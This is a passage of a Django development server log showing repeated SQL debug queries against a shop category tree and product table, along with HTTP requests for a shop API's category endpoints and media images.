"shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:36:57,487 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:36:57,492 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:36:57,496 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:36:57,500 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:36:57,505 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:36:57,509 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:36:57] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 02:36:57] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [20/Dec/2019 02:36:57] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-20 02:37:07,114 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 6; args=(6,) DEBUG 2019-12-20 02:37:07,120 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) [20/Dec/2019 02:37:07] "GET /api/v1/categories/6 HTTP/1.0" 200 956 DEBUG 2019-12-20 02:37:07,201 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:07,210 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:07,215 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:07,218 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:07,224 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:07,229 utils 4252 140031492613888 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:07,233 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 02:37:07,236 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 02:37:07,239 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 02:37:07,243 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 02:37:07,246 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 02:37:07,249 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 02:37:07,252 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 02:37:07,255 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 02:37:07,260 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 02:37:07,264 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 02:37:07,269 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 02:37:07,273 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 02:37:07,277 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 02:37:07,284 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 02:37:07,288 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 02:37:07,292 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 02:37:07,296 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 02:37:07,300 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 02:37:07,304 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 02:37:07,316 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 02:37:07,326 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 02:37:07,330 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) [20/Dec/2019 02:37:07] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 DEBUG 2019-12-20 02:37:07,338 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 02:37:07,344 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 02:37:07,351 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 02:37:07,356 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 02:37:07,360 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) [20/Dec/2019 02:37:07] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-20 02:37:07,364 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 02:37:07,369 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 02:37:07,377 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 02:37:07,382 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 02:37:07,386 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 02:37:07,391 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 02:37:07,395 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 02:37:07,399 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 02:37:07,405 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 02:37:07,411 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 02:37:07,415 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 02:37:07,421 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 02:37:07,425 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 02:37:07] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 02:37:07] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [20/Dec/2019 02:37:07] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:07] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [20/Dec/2019 02:37:07] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [20/Dec/2019 02:37:08] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [20/Dec/2019 02:37:08] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [20/Dec/2019 02:37:08] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [20/Dec/2019 02:37:08] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [20/Dec/2019 02:37:09] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [20/Dec/2019 02:37:09] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 DEBUG 2019-12-20 02:37:19,101 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-20 02:37:19,107 utils 4252 140031732287232 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [20/Dec/2019 02:37:19] "GET /api/v1/fire/ HTTP/1.0" 200 482 [20/Dec/2019 02:37:19] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [20/Dec/2019 02:37:19] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [20/Dec/2019 02:37:19] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 DEBUG 2019-12-20 02:37:31,414 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 02:37:31,421 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 02:37:31,424 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 02:37:31,427 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 02:37:31,430 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 02:37:31,432 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 02:37:31,435 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", 